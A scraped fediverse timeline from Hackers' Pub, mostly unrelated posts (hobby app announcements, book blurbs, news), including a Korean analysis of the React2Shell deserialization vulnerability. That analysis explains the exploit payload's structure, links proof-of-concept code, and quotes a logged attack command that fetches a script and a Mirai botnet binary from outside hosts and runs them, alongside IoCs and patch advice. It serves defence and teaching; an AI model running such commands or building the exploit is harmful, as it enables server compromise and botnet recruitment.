What is Hackers' Pub?

Hackers' Pub is a place for software engineers to share their knowledge and experience with each other. It's also an ActivityPub-enabled social network, so you can follow your favorite hackers in the fediverse and get their latest posts in your feed.

0
0
0
0
0
0
0
0
0
삐라따 PIRATA @pirata.bsky.social@bsky.brid.gy
Public

"저러다 손가락 잘린다 ㅋㅋ" [진지한 대답] 무기를 접촉시킨 상황에서는 '느낌'을 통해 상대의 의도를 파악할 수 있기 때문에 어쩌구 저쩌구.... [훌륭한 대답] 쟤는 초능력자라 괜찮다.

RE: https://bsky.app/profile/did:plc:c5pvs7m3vx6vk2j4dnpgsxu4/post/3ma46wtg7vk2f

0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
JH @hamoni@mastodon.social
Public
Shared by 시오

안녕하세요!

유튜브(Youtube) 영상을 텍스트로 요약해주는 서비스를 취미 프로젝트로 개발하고 있습니다.

주변 반응이 나쁘지 않아서, 클리앙에도 소개해봅니다.

무료로 운영하고 있고, 다른 요약 서비스와의 차별점은 영상전체 맥락(Context)를 완전히 유지한 요약입니다.

All 탭을 통해서 다른 유저들은 어떤 영상을 많이 보고,어떤 주제에 관심을 갖는지 트렌드를 보는 즐거움도 있습니다. :)

사용해 보시고, 많은 피드백 부탁드립니다.

secondb.ai/

SecondB - AI-Powered Content Summarizer

SecondB - AI-Powered Content Summarizer

Transform YouTube videos & Web articles into concise summaries with AI. Save time and extract key insights from your favorite content.

secondb.ai · SecondB

0
0
0
zunda @zundan@mastodon.zunda.ninja
Public

みちびき5号機以降にはほかのみちびきとの距離を測って地上局による衛星位置の推定精度を向上する機能(ISR)と地上局との距離を高精度に測定する機能(PRECT)があって、みちびきたちの位置の測定精度を向上して、衛星からGPS受信機に送る現在位置の精度を向上して、GPS受信機の位置推定精度を向上できるそうな。なるほどなあ!!

準天頂衛星システム「みちびき5号機」 /H3ロケット8号機打上げライブ中継
https://www.youtube.com/watch?v=N-MFZgHWWSo

準天頂衛星システム「みちびき5号機」 /H3ロケット8号機打上げライブ中継

準天頂衛星システム「みちびき5号機」を搭載したH3ロケット8号機の打上げの様子を、種子島宇宙センターよりライブ配信します。The live coverage of the launch of the 8th H3 Launch Vehicle (H3 F8: Flight No.8) with MICHIBIKI...

www.youtube.com · YouTube

0
0
0
赤貉☭ @akamujina@fedibird.com
Public
Shared by SparklingOutlaw🍉

物事を全か無かでしか判断できない1ビット脳の持ち主だ。このバカの言い分が正しければ、ずっと殺人や窃盗が起き続けているから法律も警察も役に立たない事になる。右翼はたいてい1ビット脳の持ち主だからいつも間違える。

0
0
0
JH @hamoni@mastodon.social
Public

안녕하세요!

유튜브(Youtube) 영상을 텍스트로 요약해주는 서비스를 취미 프로젝트로 개발하고 있습니다.

주변 반응이 나쁘지 않아서, 클리앙에도 소개해봅니다.

무료로 운영하고 있고, 다른 요약 서비스와의 차별점은 영상전체 맥락(Context)를 완전히 유지한 요약입니다.

All 탭을 통해서 다른 유저들은 어떤 영상을 많이 보고,어떤 주제에 관심을 갖는지 트렌드를 보는 즐거움도 있습니다. :)

사용해 보시고, 많은 피드백 부탁드립니다.

secondb.ai/

SecondB - AI-Powered Content Summarizer

SecondB - AI-Powered Content Summarizer

Transform YouTube videos & Web articles into concise summaries with AI. Save time and extract key insights from your favorite content.

secondb.ai · SecondB

0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
JH @hamoni@mastodon.social
Public

국가정보자원관리원의 화재로 인해 주요 정부시스템에 장애가 발생하였습니다.
이로 인해 일부 대체서비스를 공유합니다.

* 전자가족관계등록시스템 efamily.scourt.go.kr
교통민원24 efine.go.kr
세움터 eais.go.kr
농업e지 nongupez.go.kr
법원행정처 사법정보공개포털 portal.scourt.go.kr/
4대사회보험 정보연계센터 4insure.or.kr
팩트리온(공장등록증명) factoryon.go.kr
고용∙산재보험 토탈서비스 total.comwel.or.kr
임업-in 통합포털 foco.go.kr
공공보건포털 e보건소 e-health.go.kr

(※참고 : 정부24 사이트(plus.gov.kr/)에서 대체 창구를 확인 후 이용해주시기 바랍니다.)

efamily.scourt.go.kr

0
0
0
0
0
0
0
0
0
Whypost Fedi Client @whypost@silicon.moe
Public

I’m happy to announce WhyPost, a Flutter-based app currently available as a beta release.
WhyPost lets you connect multiple Fediverse accounts in one app, including Mastodon, Akkoma, Pleroma, GoToSocial, and Friendica.

Download (Beta):
codeberg.org/whypost/whypost-m

The app already supports creating posts, replies, reposts, comments, editing profiles, and deleting posts.
There are still bugs, so feedback is welcome via our Matrix room.

0
0
0
0
0
0
0
0
0
1
0
0
0
0
0

React2Shell 취약점의 특성을 알아보자

고남현 @gnh1201@hackers.pub

React2Shell 취약점이란?

외부에서 수신된 특정한 규격에 따라 구조적으로 작성된 데이터를 처리한다면, 공격자가 어떠한 의도를 가지고 있다면 데이터를 보낼 때 실행 가능한 악의적 코드를 같이 넣어 보낼 가능성을 배제할 수 없다.

이것이 보안 약점이 되지 않기 위해선 이러한 공격자의 의도를 막아야하지만, React2Shell (CVE-2025-55182) 취약점은 이러한 공격자의 의도를 막지 못하고 실행을 무제한 허용하는 방법이 발견된 것이다.

특정한 규격에 따라 구조적으로 작성된 데이터를 처리하는 과정을 일컫는 용어를 "역직렬화"(Deserialization)이라고 한다.

특정한 규격은 잘 알려진 JSON, XML, YAML가 될 수도 있고, 자체 규격이 될 수도 있고, 혼합형이 될 수도 있다. React2Shell 취약점은 혼합형(JSON + aka. Flight)을 사용하였다.

자체 규격(aka. Flight)이 JavaScript로 정의된 객체의 성격을 임의로 변경(Prototype 개념 상 존재하는 생성자 수준의 속성(__proto__, constructor)에 접근하여 객체의 성격을 임의로 바꿀 수 있음)하는데 필요한 접근성을 가지고 있었기에 가능한 것이었다.

역직렬화(Deserialization) 과정은 왜 위험한가?

실무적으로 역직렬화 과정이 위험해지는 이유는 다음과 같다.

  1. 데이터 교환 포맷은 자료형에 엄격하지 않다: 원활한 데이터 교환이 최우선이라는 목적에 만족하기 위해 엄격한 자료형(Type-safe)을 사용하도록 설계하지 않는다. 이것은 자료형 혼란(Type Confusion)을 기반으로 한 다양한 방식의 탈옥 시도를 가능케해주는 단서가 되기도 한다.
  2. 특정 단어 또는 특정 기호가, 특정 작업을 수행하는 신호탄(Trigger) 역할을 한다: 특정 특정 단어 또는 특정 기호에 의해 촉발되는 특정 작업의 유효성 검증 절차가 미흡하며 해당 어플리케이션의 범위를 벗어나 시스템으로 권한 상승과 명령 실행을 허용하는 통로가 된다. 실무적으로 가장 비중이 높은 유형이다.
  3. 미리 식별되지 못한 예약어가 있을 수 있다: 드물지만 특정 언어, 특정 프레임워크, 특정 라이브러리, 또는 특정 펌웨어 등 연관된 의존성에서 명확하게 식별되지 못한 예약어(단어, 기호)를 처리하는 구현이 존재할 가능성도 있다. 이는 특정 조건이 맞으면 발현될 가능성이 있다.

이 외에도 역직렬화 과정은 유사한 여러 취약 가능성을 가지고 있기 때문에, 역직렬화 과정을 보호하기 위한 여러 보완 장치의 구현이 필요하다.

알려진 역직렬화 취약점 사례 (언어 및 생태계별)

역직렬화 취약점이 어떤 성격을 가지는 취약점인지 빠르게 이해하기 위해선, 역직렬화 취약점과 연관이 있는 취약점 사례와 공통적인 특징을 살펴볼 수 있다. 그 사례는 다음과 같다.

언어 / 생태계역직렬화 취약점 사례주요 공통점
JavaCVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind)외부 입력이 객체 생성·역직렬화 경로(JNDI, XML/JSON 바인딩) 로 유입되어 gadget chain 또는 원격 클래스 로딩을 통해 RCE 발생
.NET (C# / VB.NET)CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase)BinaryFormatter·ViewState 등 레거시 역직렬화 포맷을 신뢰하여 임의 타입 로딩·코드 실행
PythonCVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS)pickle·unsafe YAML 로더 사용으로 역직렬화 자체가 실행 트리거
PHP (WP)CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress)unserialize() / maybe_unserialize()에 사용자 입력이 전달되어 PHP Object Injection(POP chain) 발생
RubyCVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal)YAML.load·Marshal.load 사용 시 임의 객체 생성 → 코드 실행
JavaScript / Node.jsCVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript)구조 복원·객체 재구성 로직이 신뢰되지 않은 입력을 코드/객체로 해석
GoCVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul)Unmarshal 단계에서 입력 검증 부족 → 구조체 복원 기반 로직 붕괴·DoS
RustGHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687)메모리 안전과 무관하게 serde 기반 역직렬화에서 신뢰되지 않은 데이터가 내부 타입으로 복원되어 로직 오염·DoS·잠재적 코드 실행 위험
Kotlin / AndroidCVE-2024-43080 (Android) / CVE-2024-10382 (Android Car)Intent/Bundle/IPC 역직렬화 시 타입·검증 미흡 → 권한 상승·DoS
C / C++CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf)Unpack 과정에서 데이터타입(VARIANT), vtable 포인터 오염 등 무결성 검증 부족
Swift / iOSCVE-2021-32742 (Vapor)외부 입력을 디코딩/객체 복원 시 신뢰 경계 붕괴 → DoS·정보 노출
산업용 (ICS/OT)CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC)프로젝트 파일·관리 서버 입력을 신뢰된 내부 데이터로 가정하고 역직렬화 → RCE 및 물리 시스템 영향 가능

역직렬화 취약점은 언어와 환경을 가리지 않고 다양하게 나타나고 있으며, 발견된 역직렬화 취약점은 취약점 점수(CVSS 3.x)에서도 8.0에서 10.0 범위의 매우 높은 점수를 받고 있다.

이제 사전 정보 없이도 공격 특성을 읽을 수 있다.

역직렬화 취약점이 어떤 공통적인 특성을 가지는지 설명했으니, 이제 React2Shell 공격의 개념증명(PoC)에서 보인 공격 특성을 사전 정보(공격 대상인 RSC의 내부 이해)가 없이도 어느정도 파악할 수 있다.

여기 각각 JavaScript와 Python으로 작성된 주요 공격 개념증명 코드가 있다.

  • https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/blob/main/01-submitted-poc.js
  • https://github.com/msanft/CVE-2025-55182/blob/main/poc.py

여기서 알 수 있는 정보는 다음과 같다.

  1. 잘 알려진 포맷(JSON 등)과 함께 보이는 Colon-sperated String과 같은 패턴은 활용 분야에 따라 Micro-operations, Opcodes 등의 용어로 불리며, 비실행 포맷을 최소 명령 실행이 가능한 포맷으로 활용하겠다는 의도를 나타낸다. 구현 시 무결성에 주의를 더 기울이지 않으면 역직렬화 취약점을 불러들이는 좋은 복선이 된다.
  2. 생성자 수준의 키워드 (__proto__, constructor )를 통해 Prototype을 변조할 수 있는 접근성을 가지고 있다는 것을 알 수 있다. 용어로는 "JavaScript prototype pollution"라고 한다.
  3. then 키워드를 통해 공격 대상 내부에 존재하는 Promise 객체에 붙겠다(또는 새로운 Promise 객체를 만들겠다)는 의도를 확인할 수 있다.
  4. 페이로드의 value 필드 값이 아직 역직렬화 되기 전의 문자열 형태의 JSON인 것으로 봤을 때, 공격 대상 내부에서 JSON.parse 메소드의 호출을 예상할 수 있다.
  5. 공격 코드로 보이는 _response._prefix 의 주입은 then 키워드가 등장하는 위치와 최대한 가까운 곳에서 일어나야 한다. 그래야 Promise 객체가 공격 코드를 트리거할 수 있기 때문이다.
  6. 결국 JSON 역직렬화 과정이 일어나면서, then 속성을 가지면서, 공격 코드를 수용할 수 있는 가장 연관성 높은 표현이라는 점을 모두 만족하는 부분은 {"then": "$Bx"}라는 것을 알 수 있다. $Bx를 처리하는 과정 중 (또는 $Bx가 처리한 결과에 대한 사후) 검증이 부족하다는 의미이다.
  7. 공격 절차에 포함되는 Next-Action 헤더는 애초에 이 취약점의 원인이 된 어떤 기능을 켜고 끄는 것에 관한 것임을 예상할 수 있다. 개발된 앱에 존재하는 유효한 액션에 대한 Key를 알 수 있다면 그 액션의 실행을 요청함으로서 공격 코드 또한 실행할 수 있을 것이다.

공격자는 이 취약점을 이용해서 뭘하나?

Catswords OSS로 제보된 내용에 따르면, React2Shell에 노출된 서버는 이런 명령이 들어온다고 한다. 한 회원이 학습용으로 구축한 React 서버에서 발견된 로그이다.

(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
 cd /dev; \
 busybox wget http://31.56.27.76/n2/x86; \
 chmod 777 x86; \
 ./x86 reactOnMynuts)

이 파일의 정체는 Mirai botnet이라 부르는 계열의 악성코드이다. React2Shell에 취약한 서버들은 이런 악성코드들을 서버에 주입받게 된다.

그럼 이 악성코드의 명성(?)은 어느정도일지 한번 체크해보자.

  • https://www.virustotal.com/gui/file/858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (33/65 security vendors flagged this file as malicious)

(그래 너 나쁜거 알았으니 그만 알아보자)

관련 IoC 는 다음과 같다.

  • 3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)
  • 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)
  • http://193.34.213.150/nuts/bolts (URL)
  • http://31.56.27.76/n2/x86 (URL)

범용 botnet이 설치되기 때문에 사실상 DDoS 공격 등 다양한 목적으로 악용되는 서버가 된다.

추가 분석은 아래 링크에서 확인할 수 있다.

  • https://www.mbsd.jp/research/20251211/react2shell/
  • https://www.bitdefender.com/en-us/blog/labs/cve-2025-55182-exploitation-hits-the-smart-home

이 공격을 어떻게 완화해야할까?

버전 업데이트로 해결하기

Next.js를 사용하는 서버라면 취약점이 해결된 버전으로 업데이트하여야 한다. Next.js의 개발사 Vercel은 취약한 버전에 대해 다음과 같이 안내하고 있다.

Vulnerable version Patched release
Next.js 15.0.x 15.0.5
Next.js 15.1.x 15.1.9
Next.js 15.2.x 15.2.6
Next.js 15.3.x 15.3.6
Next.js 15.4.x 15.4.8
Next.js 15.5.x 15.5.7
Next.js 16.0.x 16.0.10
Next.js 14 canaries after 14.3.0-canary.76 Downgrade to 14.3.0-canary.76 (not vulnerable)
Next.js 15 canaries before 15.6.0-canary.58 15.6.0-canary.58
Next.js 16 canaries before 16.1.0-canary.12 16.1.0-canary.12 and after

혹여 업데이트에 곤란을 겪고 있는 경우, Vercel에서 공식 제공하는 패치 도구를 활용하는 것도 좋은 방법이 될 수 있다.

  • https://github.com/vercel-labs/fix-react2shell-next

방화벽(WAF 등) 규칙의 개선으로 완화하기

Next-Action 헤더 + 시스템 OS 명령어 + 자바스크립트의 Array 또는 Object 관련 메소드, 이렇게 3요소가 같은 요청에 동시에 들어있는건 흔한 상황은 아니라는 점을 고려해서 차단 규칙을 만드는 것도 방법이 될 수 있다.

Read more →
1
0
0
[랜선효도] 제주감귤🍊 @jejuorange.bsky.social@bsky.brid.gy
Public

로켓처럼 빠른데 공짜인 배송은 없다 비용·건강 위험을 노동자에게 떠넘기는 ‘혁신’…‘소비자 편의’가 규제 기준인 사회는 당연한가 h21.hani.co.kr/arti/society... 소비자로만 살까, 시민으로 살까

로켓처럼 빠른데 공짜인 배송은 없다

10개월째 고공농성 요리사 두고…식당 ‘재오픈’ 홍보한 세종호텔

노조 “해고자 놔두고 외주화라니…고객 연락처 업체에 넘긴 것도 개인정보보호법 위반”

h21.hani.co.kr · 한겨레21

0
0
0
phoronix @phoronix@social.cutie.team
Public

Opus 1.6 Audio Codec Adds New Machine Learning Functionality

Version 1.6 of libopus as the library for the open-source Opus audio codec is now available. Opus 1.6 brings new machine learning "ML" based features in building atop the machine learning features initially added to Opus 1.5...

https://www.phoronix.com/news/Opus-1.6-Released

Opus 1.6 Audio Codec Adds New Machine Learning Functionality

Version 1.6 of libopus as the library for the open-source Opus audio codec is now available

www.phoronix.com

0
1
0
0
0
0
0
0
0
0
0
0
JH @hamoni@mastodon.social
Public
Shared by 시오

제가 개인적으로 만든 서비스(사진 모자이크 도구, 사진 일괄 스캔 도구)

clien.net/service/board/useful

제가 개인적으로 만든 서비스(사진 모자이크 도구, 사진 일괄 스캔 도구) : 클리앙

제가 개인적으로 만든 서비스가 있어 조심스럽게 올려봅니다. 예전에 테슬라 락사운드(https://lockchime.net) 다운로드 사이트를 올렸었는데... 별 반응은 없지만 유지비용을 줄이고 개선할거 개선해 그냥 유지중입니다. 무료로 그냥 서비스 하다가 그냥 애드센스 얹었는데 돈도 안됩니다. 한달에 2달러도 안나와요ㅋㅋㅋㅋ 이번에 하드디스크에 있던 스크립트들을 정리하다가 쓸만한것들만 몇개 골라내 웹으로 올렸습니다. 그중 두개 공유합니다. 1. 개인적으로 찍은 사진들을 올릴 일이 있었는데 주위에 개인정보보호상 모자이크해야 할 사람들 얼굴이 많은겁니다 ㅠㅠ 그래서 모자이크를 쉽게 해주는 스크립트를 만들었었습니다. 그후 하드디스크에 쳐박혀 있다가 발굴해 웹으로 변환해봤습니다. https://mosaic.devzip.net/ 2. 디지털화 해야 할 옛날 사진들이 많이 있었습니다. 한장한장 폰으로 찍는것도 빛반사, 그림자, 휘어짐 보정때문에 어렵고.. 그래서 평판스캐너 달린 복합기에 4개의 사진을 한번에 스캔했습니다. 스캔한 사진들을 하나하나 기울기 맞춰가며 자르는것도 일이더군요.. 그래서 또 스크립트로 만들었습니다. 4장씩 평판스캐너로 스캔한걸 입력하면 기울기, 회전 보정해서 잘라 리턴해주는걸요. 이것도 하드디스크에 쳐박혀 있다가 발굴돼 웹으로 변환해봤습니다. https://scan.devzip.net/ 나눠쓰려고 올려서 공개하는데.. 만약 광고로 보인다거나 보기 불편하시다면 삭제하겠습니다... 감사합니다~

www.clien.net

0
0
0
1
0
0
JH @hamoni@mastodon.social
Public

제가 개인적으로 만든 서비스(사진 모자이크 도구, 사진 일괄 스캔 도구)

clien.net/service/board/useful

제가 개인적으로 만든 서비스(사진 모자이크 도구, 사진 일괄 스캔 도구) : 클리앙

제가 개인적으로 만든 서비스가 있어 조심스럽게 올려봅니다. 예전에 테슬라 락사운드(https://lockchime.net) 다운로드 사이트를 올렸었는데... 별 반응은 없지만 유지비용을 줄이고 개선할거 개선해 그냥 유지중입니다. 무료로 그냥 서비스 하다가 그냥 애드센스 얹었는데 돈도 안됩니다. 한달에 2달러도 안나와요ㅋㅋㅋㅋ 이번에 하드디스크에 있던 스크립트들을 정리하다가 쓸만한것들만 몇개 골라내 웹으로 올렸습니다. 그중 두개 공유합니다. 1. 개인적으로 찍은 사진들을 올릴 일이 있었는데 주위에 개인정보보호상 모자이크해야 할 사람들 얼굴이 많은겁니다 ㅠㅠ 그래서 모자이크를 쉽게 해주는 스크립트를 만들었었습니다. 그후 하드디스크에 쳐박혀 있다가 발굴해 웹으로 변환해봤습니다. https://mosaic.devzip.net/ 2. 디지털화 해야 할 옛날 사진들이 많이 있었습니다. 한장한장 폰으로 찍는것도 빛반사, 그림자, 휘어짐 보정때문에 어렵고.. 그래서 평판스캐너 달린 복합기에 4개의 사진을 한번에 스캔했습니다. 스캔한 사진들을 하나하나 기울기 맞춰가며 자르는것도 일이더군요.. 그래서 또 스크립트로 만들었습니다. 4장씩 평판스캐너로 스캔한걸 입력하면 기울기, 회전 보정해서 잘라 리턴해주는걸요. 이것도 하드디스크에 쳐박혀 있다가 발굴돼 웹으로 변환해봤습니다. https://scan.devzip.net/ 나눠쓰려고 올려서 공개하는데.. 만약 광고로 보인다거나 보기 불편하시다면 삭제하겠습니다... 감사합니다~

www.clien.net

0
0
0
1
0
0
1
0
0
0
0
0
earthling @appassionato@mastodon.social
Public
Shared by earthling

The First Right: Self-Determination and the Transformation of International Order, 1941–2000 (Oxford Studies in International History) by Bradley R. Simpson

The idea of self-determination is one of the most significant in modern international politics. For more than a century diplomats, lawyers, scholars, activists, and ordinary people in every part of the globe have wrestled with its meaning and implications





for decolonization, human rights, sovereignty, and international order. The First Right argues that there was no one self-determination, but a century-long contest between contending visions of sovereignty and rights that were as varied and changing as the nature of sovereignty itself. In this globe-spanning narrative, Simpson argues that self-determination's meaning has often emerged not just from the United Nations but from the claims of movements and peoples on the margins of international society. Powerful states, he shows, persistently rejected expansive self-determination claims, arguing that these threatened great power conflict, the dissolution of international order, or the unravelling of the world economy. Pacific Island territories, indigenous peoples, regional and secessionist movements, and transnational solidarity groups, among others, rejected the efforts of large, powerful states to define self-determination along narrow lines. Instead, international historian Bradley R. Simpson shows they offered expansive visions of economic, political, and cultural sovereignty ranging far beyond the movement for decolonization with which they are often associated. As they did so, these movements and groups helped to vernacularize self-determination as a language of social justice and rights for people around the world.
0
0
0
뉴스봇 - 생활/문화 @news_life@802.3ether.net
Public
Shared by 시오

하동군, 폐교 활용 '추억의 만화방' 조성한다…관광 활력 기대
(하동=연합뉴스) 박정헌 기자 = 경남 하동군이 폐교를 활용해 전 세대가 즐길 수 있는 '추억의 만화방' 조성 등 만화·웹툰 콘텐츠를 접목한 관...
yna.co.kr/view/AKR202512170599

하동군, 폐교 활용 '추억의 만화방' 조성한다…관광 활력 기대 | 연합뉴스

(하동=연합뉴스) 박정헌 기자 = 경남 하동군이 폐교를 활용해 전 세대가 즐길 수 있는 '추억의 만화방' 조성 등 만화·웹툰 콘텐츠를 접목한 관...

www.yna.co.kr · 연합뉴스

0
0
0
earthling @appassionato@mastodon.social
Public
Shared by earthling

The Meaning of Life: Letters From Extraordinary People and Their Answer to Life's Biggest Question by James Bailey, 2025

James Bailey was unemployed, heartbroken, and questioning his purpose on the planet. In desperate search of an answer, he decided to write to luminaries from all fields and ask one simple question: What is the meaning of life? Then he waited. Slowly but surely their responses arrived through his letterbox.




From entrepreneurs and environmentalists, to artists, authors and adventurers, this book gathers a kaleidoscope of perspectives on what it means to be human. With over one hundred enlightening responses, it's more than just a collection of letters; it's a roadmap to finding your own path. With letters from Dame Jane Goodall, Helen Sharman OBE, Bindi Irwin, Dr Astro Teller, Catherine Coleman Flowers, Lizzie Carr, Professor Jean Golding OBE, Professor Ian Frazer AC, Dr Michael Irwin, Professor Anil Seth, Sir Tim Smit KBE, Edward O. Wilson, Dr Mya-Rose Craig, Professor Lord Robert Winston, Bill McKibben, Henry Marsh CBE, Dr Kathryn Mannix, Dame Hilary Mantel, Julian Fellowes, Michael Frayn FRSL, Jodi Picoult, Anthony Horowitz CBE, Tony Wheeler, AO, Pico Iyer, Gayatri Chakravorty Spivak FBA, Amol Rajan, Sir Alan Ayckbourn, Simon Calder, Monica Heisey, Donna Ashworth, Gyles Brandreth, Danny Wallace, Rupi Kaur, Susan Pollack MBE, Martine Wright MBE, Simon Weston CBE, Mike Haines MBE, Natalie Queiroz MBE, Sir Terry Waite KCMG CBE, Chris Moon MBE, Matt Lewis, Brian Clark, John Hoskison, Benedict Allen, Tom Turcich, Ann Daniels, Dame Ellen Macarthur, Mark Beaumont BEM, Ben Smith, Yves Rossy, Jessica Watson, Fatima Whitbread MBE, Chris Eubank, Gail Muller, Sir Ranulph Fiennes, Bonita Norris, Alexander Campbell, David Smith MBE, Yusuf / Cat Stevens, Jesse Tyler Ferguson, Rachel Portman OBE, Sir Michael Eavis, Sananda Maitreya, Ruth Rogers CBE, Luke Jerram, Stefan Sagmeister, etc.
0
0
0
0
0
0
earthling @appassionato@mastodon.social
Public
Shared by earthling

The Philosopher in the Valley: Alex Karp, Palantir, and the Rise of the Surveillance State by Michael Steinberger, 2025

An acclaimed New York Times Magazine writer brings us into the world of the controversial technology firm Palantir and its very colorful and outspoken CEO, Alex Karp, tracing the ascent of Big Data, the rise of surveillance technology, and the shifting global balance of power in the 21st century.





Palantir builds data integration software: its technology ingests vast quantities of information and quickly identifies patterns, trends, and connections that might elude the human eye. Founded in 2003 to help the US government in the war on terrorism—an early investor was the CIA—Palantir is now a $400 billion global colossus whose software is used by major intelligence services (including the Mossad), the US military, dozens of federal agencies, and corporate giants like Airbus and BP. From AI to counterterrorism to climate change to immigration to financial fraud to the future of warfare, the company is at the nexus of the most critical issues of the times.
0
0
0
뉴스봇 - 생활/문화 @news_life@802.3ether.net
Public

하동군, 폐교 활용 '추억의 만화방' 조성한다…관광 활력 기대
(하동=연합뉴스) 박정헌 기자 = 경남 하동군이 폐교를 활용해 전 세대가 즐길 수 있는 '추억의 만화방' 조성 등 만화·웹툰 콘텐츠를 접목한 관...
yna.co.kr/view/AKR202512170599

하동군, 폐교 활용 '추억의 만화방' 조성한다…관광 활력 기대 | 연합뉴스

(하동=연합뉴스) 박정헌 기자 = 경남 하동군이 폐교를 활용해 전 세대가 즐길 수 있는 '추억의 만화방' 조성 등 만화·웹툰 콘텐츠를 접목한 관...

www.yna.co.kr · 연합뉴스

0
0
0
earthling @appassionato@mastodon.social
Public
Shared by earthling

The Psychology of System Change and Resistance to Change by Winnifred R. Louis et al, 2025

A New Psychology of Intergroup Relations

Why do some societies evolve and adapt while others remain stagnant? What creates divisiveness and exclusion, and what leads to community cohesion and social progress? This book discusses the psychology of social system change and resistance to change, offering readers a deep exploration of the psychological dynamics




that shape societal transformations. Readers explore psychological perspectives on intergroup relations and group processes, alongside interdisciplinary perspectives from environmental science, history, political science, and sociology, to question and challenge conventional thinking. This readable, entertaining book contains clear definitions, lucid explanations, and key learnings in each chapter that highlight the take-home points and implications, so that readers can apply these insights to their real-world challenges. Whether you're a student, scholar, community member, or leader, this book provides important knowledge for all who are interested in understanding and influencing the dynamics of social change.
0
0
0
earthling @appassionato@mastodon.social
Public
Shared by earthling

The Revolutionary Psychologist’s Guide to Radical Therapy by Jon Hook & Frank Gruba-Mccallister, 2025

The Revolutionary Psychologist’s Guide to Radical Therapy presents a bold, comprehensive framework for anti-capitalist psychotherapy. Edited by Jon Hook and Frank Gruba-McCallister, this volume features leading voices in radical psychology who challenge the ideological foundations of mainstream therapeutic practice.





Organized into four sections—Theory, Practice, Context, and Sublation—the book begins by establishing the philosophical and political underpinnings of a liberatory therapeutic approach. It then moves into applied strategies for dismantling capitalist hegemony in clinical work, emphasizing collective liberation and social justice. The Context section situates these practices within specific cultural and historical frameworks, including Fanonian clinical methods and radical youth work. The final section explores existential and spiritual dimensions of suffering and freedom, offering a vision of therapy as a transformative force for individuals and society. Essential reading for academics, clinicians, and activists, this volume addresses the sociogenic roots of distress and advances a praxis of healing rooted in justice, resistance, and liberation.
0
0
0
0
0
0
geeknews_bot @geeknews_bot@sns.lemondouble.com
Public

GitHub, 2026년 3월부터 셀프호스티드 액션 러너에 요금 부과 예정
------------------------------
- 2026년 1월 1일부터 *GitHub 호스티드 러너 요금이 최대 39% 인하* 되고, 3월 1일부터 *셀프 호스티드 러너에 분당 0.002달러 요금* 이 부과됨
- 전체 고객의 *96%는 요금 변동이 없으며* , 4% 중 85%는 인하, 15%는 월 중간값 약 13달러 인상
- *공개 저장소의 Actions 사용은 계속 무료* 이며, GitHub Enter…
------------------------------
https://news.hada.io/topic?id=25128&utm_source=googlechat&utm_medium=bot&utm_campaign=1834

GitHub, 2026년 3월부터 셀프호스티드 액션 러너에 요금 부과 예정 | GeekNews

2026년 1월 1일부터 GitHub 호스티드 러너 요금이 최대 39% 인하되고, 3월 1일부터 셀프 호스티드 러너에 분당 0.002달러 요금이 부과됨전체 고객의 96%는 요금 변동이 없으며, 4% 중 85%는 인하, 15%는 월 중간값 약 13달러 인상공개 저장소의 Actions 사용은 계속 무료이며, GitHub Enterprise Server 고객도

news.hada.io · GeekNews

0
0
0
0
0
0